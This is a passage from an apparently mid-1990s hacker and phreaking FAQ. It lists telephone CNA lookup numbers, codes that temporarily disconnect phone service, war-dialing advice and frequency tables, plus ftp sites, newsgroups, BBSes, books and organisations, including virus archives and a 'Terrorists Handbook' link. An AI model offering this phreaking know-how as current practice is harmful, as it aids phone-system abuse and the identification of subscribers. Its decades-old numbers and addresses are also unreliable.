you are in 312 or 708, AmeriTech has a pay-for-play CNA service available to the general public. The number is 796-9600. The cost is $.35/call and can look up two numbers per call. An interesting number is The House of Windsor Collection at (800)433-3210. If you dial it and press 1 to request a catalog, it will ask for your telephone number. If will then tell you the street name of any telephone number you enter. 17. What is the telephone company CNA number for my area? 203 203-771-8080 CT (All) 516 516-321-5700 Hempstead/Long Island, NY 614 614-464-0123 Columbus/Steubenville, OH 813 813-270-8711 Ft. Meyers/St. Petersburg/Tampa, FL 513 513-397-9110 Cincinnati/Dayton, OH 18. What are some numbers that always ring busy? 216 xxx-9887 Akron/Canton/Cleveland/Lorain/Youngstown, OH 316 952-7265 Dodge City/Wichita, KS 501 377-99xx AR (All) 719 472-3773 Colorado Springs/Leadville/Pueblo, CO 719 577-6100 to 577-6200 Colorado Springs/Leadville/Pueblo, CO 818 885-0699 Pasadena, CA 906 632-9999 Marquette/Sault Ste. Marie, MI 906 635-9999 Marquette/Sault Ste. Marie, MI 914 576-9903 Peekskill/Poughkeepsie/White Plains/Yonkers, NY 19. What are some numbers that temporarily disconnect phone service? 314 511 Columbia/Jefferson City/St.Louis, MO (1 minute) 404 420 Atlanta, GA (5 minutes) 405 953 Enid/Oklahoma City, OK (1 minute) 407 511 Orlando/West Palm Beach, FL (1 minute) 512 200 Austin/Corpus Christi, TX (1 minute) 516 480 Hempstead/Long Island, NY (1 minute) 603 980 NH (All) 512 200 Austin/Corpus Christi, TX (1 minute) 919 211 or 511 Durham, NC (10 min - 1 hour) 20. What is scanning? Scanning is dialing a large number of telephone numbers in the hope of finding interesting carriers (computers) or tones. Scanning can be done by hand, although dialing several thousand telephone numbers by hand is extremely boring and takes a long time. Much better is to use a scanning program, sometimes called a war dialer or a demon dialer. Currently, the best war dialer available to PC-DOS users is ToneLoc from Minor Threat and Mucho Maas. A war dialer will dial a range of numbers and log what it finds at each number. You can then only dial up the numbers that the war dialer marked as carriers or tones. 21. Is scanning illegal? Excerpt from: 2600, Spring 1990, Page 27: -BQ- In some places, scanning has been made illegal. It would be hard, though, for someone to file a complaint against you for scanning since the whole purpose is to call every number once and only once. It's not likely to be thought of as harassment by anyone who gets a single phone call from a scanning computer. Some central offices have been known to react strangely when people start scanning. Sometimes you're unable to get a dialtone for hours after you start scanning. But there is no uniform policy. The best thing to do is to first find out if you've got some crazy law saying you can't do it. If, as is likely, there is no such law, the only way to find out what happens is to give it a try. -EQ- It should be noted that a law making scanning illegal was recently passed in Colorado Springs, CO. It is now illegal to place a call in Colorado Springs without the intent to communicate. 22. Where can I purchase a lineman's handset? Contact East 335 Willow Street North Andover, MA 01845-5995 (508)682-2000 Jensen Tools 7815 S. 46th Street Phoenix, AZ 85044-5399 Time Motion Tools 12778 Brookprinter Place Poway, CA 92064 (619)679-0303 23. What are the DTMF frequencies? DTMF stands for Dual Tone Multi Frequency. These are the tones you get when you press a key on your telephone touchpad. The tone of the button is the sum of the column and row tones. The ABCD keys do not exist on standard telephones. 1209 1336 1477 1633 697 1 2 3 A 770 4 5 6 B 852 7 8 9 C 941 * 0 # D 24. What are the frequencies of the telephone tones? Type Hz On Off --------------------------------------------------------------------- Dial Tone 350 & 400 --- --- Busy Signal 480 & 620 0.5 0.5 Toll Congestion 480 & 620 0.2 0.3 Ringback (Normal) 440 & 480 2.0 4.0 Ringback (PBX) 440 & 480 1.5 4.5 Reorder (Local) 480 & 620 3.0 2.0 Invalid Number 200 & 400 Hang Up Warning 1400 & 2060 0.1 0.1 Hang Up 2450 & 2600 --- --- 25. What are all of the * codes? Local Area Signalling Services (LASS) and Custom Calling Feature Control Codes: (These appear to be standard, but may be changed locally) Service Tone Pulse/rotary Notes -------------------------------------------------------------------------- Assistance/Police *12 n/a [1] Cancel forwarding *30 n/a [C1] Automatic Forwarding *31 n/a [C1] Notify *32 n/a [C1] [2] Intercom Ring 1 (..) *51 1151 [3] Intercom Ring 2 (.._) *52 1152 [3] Intercom Ring 3 (._.) *53 1153 [3] Extension Hold *54 1154 [3] Customer Originated Trace *57 1157 Selective Call Rejection *60 1160 (or Call Screen) Selective Distinct Alert *61 1161 Selective Call Acceptance *62 1162 Selective Call Forwarding *63 1163 ICLID Activation *65 1165 Call Return (outgoing) *66 1166 Number Display Blocking *67 1167 [4] Computer Access Restriction *68 1168 Call Return (incoming) *69 1169 Call Waiting disable *70 1170 [4] No Answer Call Transfer *71 1171 Usage Sensitive 3 way call *71 1171 Call Forwarding: start *72 or 72# 1172 Call Forwarding: cancel *73 or 73# 1173 Speed Calling (8 numbers) *74 or 74# 1174 Speed Calling (30 numbers) *75 or 75# 1175 Anonymous Call Rejection *77 1177 [5] [M: *58] Call Screen Disable *80 1160 (or Call Screen) [M: *50] Selective Distinct Disable *81 1161 [M: *51] Select. Acceptance Disable *82 1162 Select. Forwarding Disable *83 1163 [M: *53] ICLID Disable *85 1165 Call Return (cancel out) *86 1186 [6] [M: *56] Anon. Call Reject (cancel) *87 1187 [5] [M: *68] Call Return (cancel in) *89 1189 [6] [M: *59] Notes: [C1] - Means code used for Cellular One service [1] - for cellular in Pittsburgh, PA A/C 412 in some areas [2] - indicates that you are not local and maybe how to reach you [3] - found in Pac Bell territory; Intercom ring causes a distinctive ring to be generated on the current line; Hold keeps a call connected until another extension is picked up [4] - applied once before each call [5] - A.C.R. blocks calls from those who blocked Caller ID (used in C&P territory, for instance) [6] - cancels further return attempts [M: *xx] - alternate code used for MLVP (multi-line variety package) by Bellcore. It goes by different names in different RBOCs. In Bellsouth it is called Prestige. It is an arrangement of ESSEX like features for single or small multiple line groups. The reason for different codes for some features in MLVP is that call-pickup is *8 in MLVP so all *8x codes are reaasigned *5x 26. What frequencies do cordless phones operate on? Here are the frequencies for the first generation 46/49mhz phones. The new 900mhz cordless phones are not covered. Channel Handset Transmit Base Transmit ------- ---------------- ------------- 1 49.670mhz 46.610mhz 2 49.845 46.630 3 49.860 46.670 4 49.770 46.710 5 49.875 46.730 6 49.830 46.770 7 49.890 46.830 8 49.930 46.870 9 49.990 46.930 10 49.970 46.970 Section C: Resources ~~~~~~~~~~~~~~~~~~~~ 01. What are some ftp sites of interest to hackers? alex.sp.cs.cmu.edu /links/security (Misc) aql.gatech.edu (40Hex) athena-dist.mit.edu /pub/ATHENA (Athena Project) bellcore.com (Bellcore) camelot.usc.edu /pub/cellular/DDIinfodemo (Cellular) cert.org (CERT) coast.cs.purdue.edu /pub (Security) coast.cs.purdue.edu /pub (Coast) cs.columbia.edu /archives/mirror2/world-info/obi/Phracks crimelab.com (Crimelab) dartmouth.edu /pub/security (Security) fc.net /pub/defcon (DefCon) freeside.com (Phrack) lod.amaranth.com (Legion of Doom) ftp.apple.com /pub/stud_reps/phrack (Zines) ftp.3com.com /Orange-Book (Orange Book) ftp.3com.com /mirrors/zip (ZipCrypt) ftp.IEunet.ie /pub/security (Security) ftp.armory.com /pub/user/kmartind (H/P) ftp.cert.org /pub (CERT) ftp.cic.net /pub/e-serials/alphabetic/p/phrack (Zines) ftp.clark.net /pub/jcase (H/P) ftp.commerce.net /pubs/standards/drafts/shttp.txt(Secure HyperText) ftp.cs.uwm.edu /pub/comp-privacy (Comp. Privacy Digest) ftp.csl.sri.com /pub/nides (SRI) ftp.csua.berkeley.edu /pub/cypherpunks (Crypto) ftp.eff.org /pub/cud (EFF) ftp.elelab.nsc.co.jp /pub/security (Security) ftp.etext.org (Etext) ftp.fc.net ftp.fh-berlin.de (Wordlists) ftp.greatcircle.com /pub/firewalls (Firewalls) ftp.halcyon.com /pub/cud (Zines) ftp.inoc.dl.nec.com /pub/security (Security) ftp.mcs.com /mcsnet.users/crisadm/stuff/research/samples (Virii) ftp.near.net /security/archives/phrack (Zines) ftp.netcom.com /pub/br/bradleym (Virii) ftp.netcom.com /pub/va/vandal (DnA) ftp.netcom.com /pub/vo/vortex (Phiber-Scream) ftp.netcom.com /pub/zz/zzyzx (H/P) ftp.ocs.mq.edu.au /PC/Crypt (Crypto) ftp.paranoia.com /pub/toneloc/tl110.zip (ToneLoc) ftp.primus.com /pub/armchair (Phoney) ftp.primus.com /pub/security (Security) ftp.rahul.net /pub/lps (Home of the FAQ) ftp.std.com /archives/alt.locksmithing (Locksmithing) ftp.std.com /obi/Mischief/ (MIT Guide to Lock...) ftp.std.com /obi/Phracks (Zines) ftp.sunet.se /pub/network/monitoring (Ethernet sniffers) ftp.sura.net /pub/security (SURAnet) ftp.tis.com /pub (TIS) ftp.uu.net /doc/literary/obi/Phracks (Zines) ftp.warwick.ac.uk /pub/cud (Zines) ftp.win.tue.nl /pub/security (Security) ftp.winternet.com /users/craigb (H/P) ftp.wustl.edu /doc/EFF (EFF) furmint.nectar.cs.cmu.edu /security (Crypto) garbo.uwasa.fi /pc/crypt (Crypto) irbis.llnl.gov /pub (CIAC) lcs.mit.edu /telecom-archives (Telecom archives) mary.iia.org /pub/users/patriot (Misc) net.tamu.edu /pub/security/TAMU (Security) net23.com /pub (Max Headroom) nic.ddn.mil /scc (DDN Security) nic.funet.fi /pub/doc/cud (Zines) paradox1.denver.colorado.edu /anonymous/text-files/pyrotechnics (Pyro) pyrite.rutgers.edu /pub/security (Security) relay.cs.toronto.edu /doc/telecom-archives (Telecom) rena.dit.co.jp /pub/security (Security) research.att.com /dist/internet_security (AT&T) ripem.msu.edu /pub/crypt (Ripem) rs1.rrz.uni-koeln.de (Wordlists) rtfm.mit.edu (Etext) rtfm.mit.edu /pub/usenet-by-group (Usenet FAQ's) sable.ox.ac.uk (Wordlists) scss3.cl.msu.edu /pub/crypt (Crypto) sekurity.com (TNO) spy.org (CSC) suburbia.apana.org.au /pub/unix/security (Security) theta.iis.u-tokyo.ac.jp /pub1/security (Security) titania.mathematik.uni-ulm.de /pub/security (Security) uceng.uc.edu /pub/kerberos.documentation (Kerberos) wimsey.bc.ca /pub/crypto (Crypto) 02. What are some newsgroups of interest to hackers? alt.2600 Do it 'til it hertz alt.2600.hope.tech Technology concerns for Hackers on Planet Earth 1994 alt.cellular alt.cyberpunk High-tech low-life. alt.cyberspace Cyberspace and how it should work. alt.dcom.telecom Discussion of telecommunications technology alt.engr.explosives [no description available] alt.hackers Descriptions of projects currently under development alt.locksmithing You locked your keys in *where*? alt.hackers.malicious The really bad guys - don't take candy from them alt.privacy.anon-server Technical & policy matters of anonymous contact servers alt.radio.pirate Hide the gear, here comes the magic station-wagons. alt.radio.scanner Discussion of scanning radio receivers. alt.security Security issues on computer systems alt.security.index Pointers to good stuff in misc.security (Moderated) alt.security.keydist Exchange of keys for public key encryption systems alt.security.pgp The Pretty Good Privacy package alt.security.ripem A secure email system illegal to export from the US comp.dcom.cellular [no description available] comp.dcom.telecom Telecommunications digest (Moderated) comp.dcom.telecom.tech [no description available] comp.org.cpsr.announce Computer Professionals for Social Responsibility comp.org.cpsr.talk Issues of computing and social responsibility comp.org.eff.news News from the Electronic Frontiers Foundation comp.org.eff.talk Discussion of EFF goals, strategies, etc. comp.protocols.kerberos The Kerberos authentification server comp.protocols.tcp-ip TCP and IP network protocols comp.risks Risks to the public from computers & users comp.security.announce Announcements from the CERT about security comp.security.misc Security issues of computers and networks comp.security.unix Discussion of Unix security comp.virus Computer viruses & security (Moderated) de.org.ccc Mitteilungen des CCC e.V. misc.security Security in general, not just computers (Moderated) rec.pyrotechnics Fireworks, rocketry, safety, & other topics rec.radio.scanner [no description available] rec.video.cable-tv Technical and regulatory issues of cable television. sci.crypt Different methods of data en/decryption 03. What are some telnet sites of interest to hackers? ntiabbs.ntia.doc.gov (NTIA) telnet lust.isca.uiowa 2600 (underground bbs) 04. What are some gopher sites of interest to hackers? ba.com (Bell Atlantic) csrc.ncsl.nist.gov (NIST Security Gopher) gopher.acm.org (SIGSAC (Security, Audit & Control)) gopher.cpsr.org (Computer Professionals for Social Responsibility) gopher.cs.uwm.edu gopher.eff.org (Electonic Frontier Foundation) gopher.wired.com (Wired Magazine) gw.PacBell.com (Pacific Bell) iitf.doc.gov (NITA -- IITF) oss.net (Open Source Solutions) spy.org (Computer Systems Consulting) wiretap.spies.com (Wiretap) 05. What are some World wide Web (WWW) sites of interest to hackers? http://aset.rsoc.rockwell.com (NASA/MOD AIS Security) http://aset.rsoc.rockwell.com/exhibit.html(Technology for Information Security) http://ausg.dartmouth.edu/security.html (Security) http://crimelab.com/bugtraq/bugtraq.html (Bugtraq) http://cs.purdue.edu/coast/coast.html (Coast) http://csrc.ncsl.nist.gov (NIST) http://dans.dorm.umd.edu/~deker http://dfw.net/~aleph1 http://draco.centerline.com:8080/~franl/crypto.html (Crypto) http://everest.cs.ucdavis.edu/Security.html (Security) http://everest.cs.ucdavis.edu/slides/slides.html(Security Lab Slides) http://ezinfo.ethz.ch/ETH/D-REOK/fsk/fsk_homepage.html (CSSCR) http://first.org (FIRST) http://ftp.tamu.edu/~abr8030/security.html (Security) http://hightop.nrl.navy.mil/potpourri.html (Security) http://hightop.nrl.navy.mil/rainbow.html (Rainbow Books) http://info.bellcore.com/BETSI/betsi.html (Betsi) http://infosec.nosc.mil/infosec.html (SPAWAR INFOSEC) http://l0pht.com (The l0pht) http://mls.saic.com (SAIC MLS) http://naic.nasa.gov/fbi/FBI_homepage.html (FBI Homepage) http://nasirc.hq.nasa.gov (NASA ASIRC) http://ophie.hughes.american.edu/~ophie http://tansu.com.au/Info/security.html (Computer and Network Security) http://the-tech.mit.edu (LaMacchia case info) http://wintermute.itd.nrl.navy.mil/5544.html (Network Security) http://www.aads.net (Ameritech) http://www.achilles.net/~pluvius http://www.alw.nih.gov/WWW/security.html (Unix Security) http://www.artcom.de/CCC (CCC Homepage) http://www.ba.com (Bell Atlantic) http://www.beckman.uiuc.edu/groups/biss/VirtualLibrary/xsecurity.html(X-Win) http://www.bell.com (MFJ Task Force) http://www.bellcore.com/SECURITY/security.html (Bellcore Security Products) http://www.brad.ac.uk/~nasmith/index.html http://www.bst.bls.com (BellSouth) http://www.c3.lanl.gov/~mcn (Lanl) http://www.commerce.net/information/standards/drafts/shttp.txt (HyperText) http://www.contrib.andrew.cmu.edu:8001/usr/dscw/home.html http://www.cpsr.org/home (CPSR) http://www.cs.umd.edu/~lgas http://www.cs.cmu.edu:8001/afs/cs.cmu.edu/user/bsy/www/sec.html (Security) http://www.csd.harris.com/secure_info.html (Harris) http://www.csl.sri.com (SRI Computer Science Lab) http://www.cygnus.com/data/cns.html (Cygnus Network Security) http://www.datafellows.fi (Data Fellows) http://www.delmarva.com/raptor/raptor.html (Raptor Eagle Network Isolator) http://www.demon.co.uk/kbridge (KarlBridge) http://www.digicash.com/ecash/ecash-home.html (Digital Cash) http://www.digital.com/info/key-secure-index.html(Digital Secure Systems) http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html(Bugtraq) http://www.eecs.nwu.edu/~jmyers/ids/index.html (Intrusion Detection Systems) http://www.engin.umich.edu/~jgotts/boxes.html (Box info) http://www.engin.umich.edu/~jgotts/hack-faq.html(This document) http://www.engin.umich.edu/~jgotts/underground.html http://www.ensta.fr/internet/unix/sys_admin (System administration) http://www.fc.net/defcon (DefCon) http://www.greatcircle.com (Great Circle Associates) http://www.hpcc.gov/blue94/section.4.6.html (NSA) http://www.ic.gov (The CIA) http://www.lerc.nasa.gov/Unix_Team/Dist_Computing_Security.html (Security) http://www.lysator.liu.se:7500/terror/thb_title.html (The Terrorists Handbook) http://www.lysator.liu.se:7500/mit-guide/mit-guide.html (MIT Lockpicking Guide) http://www.net23.com (Max Headroom) http://www.nist.gov (NIST) http://www.pacbell.com (Pacific Bell) http://www.paranoia.com/mthreat (ToneLoc) http://www.pegasus.esprit.ec.org/people/arne/pgp.html (PGP) http://www.phantom.com/~king (Taran King) http://www.quadralay.com/www/Crypt/Crypt.html (Quadralay Cryptography Archive) http://www.research.att.com (AT&T) http://www.rsa.com (RSA Data Security) http://www.satelnet.org/~ccappuc http://www.service.com/cm/uswest/usw1.html (USWest) http://www.shore.net/~oz/welcome.html (Hack TV) http://www.spy.org (Computer Systems Consulting) http://www.sri.com (SRI) http://www.tansu.com.au/Info/security.html (Security Reference Index) http://www.tis.com (Trusted Information Systems) http://www.tri.sbc.com (Southwestern Bell) http://www.uci.agh.edu.pl/pub/security (Security) http://www.umcc.umich.edu/~doug/virus-faq.html (Virus) http://www.wam.umd.edu/~ankh/Public/devil_does_unix http://www.wiltel.com (Wiltel) http://www.wired.com (Wired Magazine) 06. What are some IRC channels of interest to hackers? #2600 #cellular #hack #phreak #linux #root #unix #warez 07. What are some BBS's of interest to hackers? Hacker's Haven (303)343-4053 Corrupt Sekurity (303)753-1719 Independent Nation (315)656-4179 underworld_1994.com (514)683-1894 Digital Fallout (516)378-6640 Alliance Communications (612)251-8596 Apocalypse 2000 (708)676-9855 K0dE Ab0dE (713)579-2276 fARM R0Ad 666 (713)855-0261 08. What books are available on this subject? General Computer Security ~~~~~~~~~~~~~~~~~~~~~~~~~ Computer Security Basics Author: Deborah Russell and G.T. Gengemi Sr. Publisher: O'Reilly & Associates, Inc. Copyright Date: 1991 ISBN: 0-937175-71-4 This is an excellent book. It gives a broad overview of computer security without sacrificing detail. A must read for the beginning security expert. Computer Security Management Author: Karen Forcht Publisher: Boyd and Fraser Copyright Date: 1994 ISBN: 0-87835-881-1 Information Systems Security Author: Philip Fites and Martin Kratz Publisher: Van Nostrad Reinhold Copyright Date: 1993 ISBN: 0-442-00180-0 Computer Related Risks Author: Peter G. Neumann Publisher: Addison-Wesley Copyright Date: 1995 ISBN: 0-201-55805-X Computer Security Management Author: Karen Forcht Publisher: boyd & fraser publishing company Copyright Date: 1994 ISBN: 0-87835-881-1 Unix System Security ~~~~~~~~~~~~~~~~~~~~ Practical Unix Security Author: Simson Garfinkel and Gene Spafford Publisher: O'Reilly & Associates, Inc. Copyright Date: 1991 ISBN: 0-937175-72-2 Finally someone with a very firm grasp of Unix system security gets down to writing a book on the subject. Buy this book. Read this book. Firewalls and Internet Security Author: William Cheswick and Steven Bellovin Publisher: Addison Wesley Copyright Date: 1994 ISBN: 0-201-63357-4 Unix System Security Author: Rik Farrow Publisher: Addison Wesley Copyright Date: 1991 ISBN: 0-201-57030-0 Unix Security: A Practical Tutorial Author: N. Derek Arnold Publisher: McGraw Hill Copyright Date: 1993 ISBN: 0-07-002560-6 Unix System Security: A Guide for Users and Systems Administrators Author: David A. Curry Publisher: Addison-Wesley Copyright Date: 1992 ISBN: 0-201-56327-4 Unix System Security Author: Patrick H. Wood and Stephen G. Kochan Publisher: Hayden Books Copyright Date: 1985 ISBN: 0-672-48494-3 Unix Security for the Organization Author: Richard Bryant Publisher: Sams Copyright Date: 1994 ISBN: 0-672-30571-2 Network Security ~~~~~~~~~~~~~~~~ Network Security Secrets Author: David J. Stang and Sylvia Moon Publisher: IDG Books Copyright Date: 1993 ISBN: 1-56884-021-7 Not a total waste of paper, but definitely not worth the $49.95 purchase price. The book is a rehash of previously published information. The only secret we learn from reading the book is that Sylvia Moon is a younger woman madly in love with the older David Stang. Complete Lan Security and Control Author: Peter Davis Publisher: Windcrest / McGraw Hill Copyright Date: 1994 ISBN: 0-8306-4548-9 and 0-8306-4549-7 Network Security Author: Steven Shaffer and Alan Simon Publisher: AP Professional Copyright Date: 1994 ISBN: 0-12-638010-4 Cryptography ~~~~~~~~~~~~ Applied Cryptography: Protocols, Algorithms, and Source Code in C Author: Bruce Schneier Publisher: John Wiley & Sons Copyright Date: 1994 ISBN: 0-471-59756-2 Bruce Schneier's book replaces all other texts on cryptography. If you are interested in cryptography, this is a must read. This may be the first and last book on cryptography you may ever need to buy. Cryptography and Data Security Author: Dorothy Denning Publisher: Addison-Wesley Publishing Co. Copyright Date: 1982 ISBN: 0-201-10150-5 Protect Your Privacy: A Guide for PGP Users Author: William Stallings Publisher: Prentice-Hall Copyright Date: 1994 ISBN: 0-13-185596-4 Programmed Threats ~~~~~~~~~~~~~~~~~~ The Little Black Book of Computer Viruses Author: Mark Ludwig Publisher: American Eagle Publications Copyright Date: 1990 ISBN: 0-929408-02-0 The original, and still the best, book on computer viruses. No media hype here, just good clean technical information. Computer Viruses, Artificial Life and Evolution Author: Mark Ludwig Publisher: American Eagle Publications Copyright Date: 1993 ISBN: 0-929408-07-1 Computer Viruses, Worms, Data Diddlers, Killer Programs, and Other Threats to Your System Author: John McAfee and Colin Haynes Publisher: St. Martin's Press Copyright Date: 1989 ISBN: 0-312-03064-9 and 0-312-02889-X The Virus Creation Labs: A Journey Into the Underground Author: George Smith Publisher: American Eagle Publications Copyright Date: 1994 ISBN: Telephony ~~~~~~~~~ Engineering and Operations in the Bell System Author: R.F. Rey Publisher: Bell Telephont Laboratories Copyright Date: 1983 ISBN: 0-932764-04-5 Although hopelessly out of date, this book remains *THE* book on telephony. This book is 100% Bell, and is loved by phreaks the world over. Telephony: Today and Tomorrow Author: Dimitris N. Chorafas Publisher: Prentice-Hall Copyright Date: 1984 ISBN: 0-13-902700-9 The Telecommunications Fact Book and Illustrated Dictionary Author: Ahmed S. Khan Publisher: Delmar Publishers, Inc. Copyright Date: 1992 ISBN: 0-8273-4615-8 I find this dictionary to be an excellent reference book on telephony, and I recommend it to anyone with serious intentions in the field. Hacking History and Culture ~~~~~~~~~~~~~~~~~~~~~~~~~~~ The Hacker Crackdown: Law and Disorder on the Electronic Frontier Author: Bruce Sterling Publisher: Bantam Books Copyright Date: 1982 ISBN: 0-553-56370-X Bruce Sterling has recently released the book FREE to the net. The book is much easier to read in print form, and the paperback is only $5.99. Either way you read it, you will be glad you did. Mr. Sterling is an excellent science fiction author and has brought his talent with words to bear on the hacking culture. A very enjoyable reading experience. Cyberpunk Author: Katie Hafner and John Markoff Publisher: Simon and Schuster Copyright Date: 1991 ISBN: 0-671-77879-X The Cuckoo's Egg Author: Cliff Stoll Publisher: Simon and Schuster Copyright Date: 1989 ISBN: 0-671-72688-9 Hackers: Heroes of the Computer Revolution Author: Steven Levy Publisher: Doubleday Copyright Date: 1984 ISBN: 0-440-13495-6 Unclassified ~~~~~~~~~~~~ The Hacker's Handbook Author: Hugo Cornwall Publisher: E. Arthur Brown Company Copyright Date: ISBN: 0-912579-06-4 Secrets of a Super Hacker Author: The Knightmare Publisher: Loompanics Copyright Date: 1994 ISBN: 1-55950-106-5 The Knightmare is no super hacker. There is little or no real information in this book. The Knightmare gives useful advice like telling you not to dress up before going trashing. The Knightmare's best hack is fooling Loompanics into publishing this garbage. The Day The Phones Stopped Author: Leonard Lee Publisher: Primus / Donald I Fine, Inc. Copyright Date: 1992 ISBN: 1-55611-286-6 Total garbage. Paranoid delusions of a lunatic. Less factual data that an average issue of the Enquirer. Information Warfare Author: Winn Swartau Publisher: Thunder Mountain Press Copyright Date: 1994 ISBN: 1-56025-080-1 An Illustrated Guide to the Techniques and Equipment of Electronic Warfare Author: Doug Richardson Publisher: Salamander Press Copyright Date: ISBN: 0-668-06497-8 09. What are some mailing lists of interest to hackers? Academic Firewalls Reflector Address: Registration Address: Send a message to majordomo@greatcircle.com containing the line "subscribe firewalls user@host" Bugtraq Reflector Address: bugtraq@crimelab.com Registration Address: bugtraq-request@crimelab.com Cert Tools Reflector Address: cert-tools@cert.org Registration Address: cert-tools-request@cert.org Computers and Society Reflector Address: Comp-Soc@limbo.intuitive.com Registration Address: taylor@limbo.intuitive.com Coordinated Feasibility Effort to Unravel State Data Reflector Address: ldc-sw@cpsr.org Registration Address: CPSR Announcement List Reflector Address: cpsr-announce@cpsr.org Registration Address: CPSR - Intellectual Property Reflector Address: cpsr-int-prop@cpsr.org Registration Address: CPSR - Internet Library Reflector Address: cpsr-library@cpsr.org Registration Address: DefCon Announcement List Reflector Address: Registration Address: Send a message to majordomo@fc.net containing the line "subscribe dc-announce" DefCon Chat List Reflector Address: Registration Address: Send a message to majordomo@fc.net containing the line "subscribe dc-stuff" Macintosh Security Reflector Address: mac-security@eclectic.com Registration Address: mac-security-request@eclectic.com NeXT Managers Reflector Address: Registration Address: next-managers-request@stolaf.edu Phiber-Seream Reflector Address: Registration Address: Send a message to listserv@netcom.com containing the line "subscribe phiber-scream user@host" rfc931-users Reflector Address: rfc931-users@kramden.acf.nyu.edu Registration Address: brnstnd@nyu.edu RSA Users Reflector Address: rsaref-users@rsa.com Registration Address: rsaref-users-request@rsa.com 10. What are some print magazines of interest to hackers? 2600 - The Hacker Quarterly ~~~~~~~~~~~~~~~~~~~~~~~~~~~ E-mail address: 2600@well.sf.ca.us Subscription Address: 2600 Subscription Dept PO Box 752 Middle Island, NY 11953-0752 Letters and article submission address: 2600 Editorial Dept PO Box 99 Middle Island, NY 11953-0099 Subscriptions: United States: $21/yr individual, $50 corporate. Overseas: $30/yr individual, $65 corporate. Gray Areas ~~~~~~~~~~ Gray Areas examines gray areas of law and morality and subject matter which is illegal, immoral and/oe controversial. Gray Areas explores why hackers hack and puts hacking into a sociological framework of deviant behavior. E-Mail Address: grayarea@well.sf.ca.us E-Mail Address: grayarea@netaxs.com U.S. Mail Address: Gray Areas PO Box 808 Broomall, PA 19008 Subscriptions: $26.00 4 issues first class $34.00 4 issues foreign (shipped air mail) Wired ~~~~~ Subscription Address: subscriptions@wired.com or: Wired PO Box 191826 San Francisco, CA 94119-9866 Letters and article submission address: guidelines@wired.com or: Wired 544 Second Street San Francisco, CA 94107-1427 Subscriptions: $39/yr (US) $64/yr (Canada/Mexico) $79/yr (Overseas) Nuts & Volts ~~~~~~~~~~~~ T& L Publications 430 Princeland Court Corona, CA 91719 (800)783-4624 (Voice) (Subscription Only Order Line) (909)371-8497 (Voice) (909)371-3052 (Fax) CIS: 74262,3664 11. What are some organizations of interest to hackers? Computer Professionals for Social Responsibility (CPSR) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ CPSR empowers computer professionals and computer users to advocate for the responsible use of information technology and empowers all who use computer technology to participate in the public debate. As technical experts, CPSR members provide the public and policymakers with realistic assessments of the power, promise, and limitations of computer technology. As an organization of concerned citizens, CPSR directs public attention to critical choices concerning the applications of computing and how those choices affect society. By matching unimpeachable technical information with policy development savvy, CPSR uses minimum dollars to have maximum impact and encourages broad public participation in the shaping of technology policy. Every project we undertake is based on five principles: * We foster and support public discussion of and public responsibility for decisions involving the use of computers in systems critical to society. * We work to dispel popular myths about the infallibility of technological systems. * We challenge the assumption that technology alone can solve political and social problems. * We critically examine social and technical issues within the computer profession, nationally and internationally. * We encourage the use of computer technology to improve the quality of life. CPSR Membership Categories 75 REGULAR MEMBER 50 Basic member 200 Supporting member 500 Sponsoring member 1000 Lifetime member 20 Student/low income member 50 Foreign subscriber 50 Library/institutional subscriber CPSR National Office P.O. Box 717 Palo Alto, CA 94301 415-322-3778 415-322-3798 (FAX) E-mail: cpsr@csli.stanford.edu Electronic Frontier Foundation (EFF) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The Electronic Frontier Foundation (EFF) is dedicated to the pursuit of policies and activities that will advance freedom and openness in computer-based communications. It is a member-supported, nonprofit group that grew from the conviction that a new public interest organization was needed in the information age; that this organization would enhance and protect the democratic potential of new computer communications technology. From the beginning, the EFF determined to become an organization that would combine technical, legal, and public policy expertise, and would apply these skills to the myriad issues and concerns that arise whenever a new communications medium is born. Memberships are $20.00 per year for students, $40.00 per year for regular members, and $100.00 per year for organizations. The Electronic Frontier Foundation, Inc. 666 Pennsylvania Avenue S.E., Suite 303 Washington, D.C. 20003 +1 202 544 9237 +1 202 547 5481 FAX Internet: eff@eff.org Free Software Foundation (FSF) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ GNU ~~~ The League for Programming Freedom (LPF) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The League for Programming Freedom is an organization of people who oppose the attempt to monopolize common user interfaces through "look and feel" copyright lawsuits. Some of us are programmers, who worry that such monopolies will obstruct our work. Some of us are users, who want new computer systems to be compatible with the interfaces we know. Some are founders of hardware or software companies, such as Richard P. Gabriel. Some of us are professors or researchers, including John McCarthy, Marvin Minsky, Guy L. Steele, Jr., Robert S. Boyer and Patrick Winston. "Look and feel" lawsuits aim to create a new class of government- enforced monopolies broader in scope than ever before. Such a system of user-interface copyright would impose gratuitous incompatibility, reduce competition, and stifle innovation. We in the League hope to prevent these problems by preventing user-interface copyright. The League is NOT opposed to copyright law as it was understood until 1986 -- copyright on particular programs. Our aim is to stop changes in the copyright system which would take away programmers' traditional freedom to write new programs compatible with existing programs and practices. Annual dues for individual members are $42 for employed professionals, $10.50 for students, and $21 for others. We appreciate activists, but members who cannot contribute their time are also welcome. To contact the League, phone (617) 243-4091, send Internet mail to the address league@prep.ai.mit.edu, or write to: League for Programming Freedom 1 Kendall Square #143 P.O. Box 9171 Cambridge, MA 02139 USA SotMesc ~~~~~~~ Founded in 1989, SotMesc is dedicated to preserving the integrity and cohesion of the computing society. By promoting computer education, liberties and efficiency, we believe we can secure freedoms for all computer users while retaining privacy. SotMesc maintains the CSP Internet mailing list, the SotMesc Scholarship Fund, and the SotMesc Newsletter. The SotMESC is financed partly by membership fees, and donations, but mostly by selling hacking, cracking, phreaking, electronics, internet, and virus information and programs on disk and bound paper media. SotMesc memberships are $20 to students and $40 to regular members. SotMESC P.O. Box 573 Long Beach, MS 39560 Computer Emergency Response Team (CERT ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ CERT is the Computer Emergency Response Team that was formed by the Defense Advanced Research Projects Agency (DARPA) in November 1988 in response to the needs exhibited during the Internet worm incident. The CERT charter is to work with the Internet community to facilitate its response to computer security events involving Internet hosts, to take proactive steps to raise the community's awareness of computer security issues, and to conduct research targeted at improving the security of existing systems. CERT products and services include 24-hour technical assistance for responding to computer security incidents, product vulnerability assistance, technical documents, and seminars. In addition, the team maintains a number of mailing lists (including one for CERT advisories) and 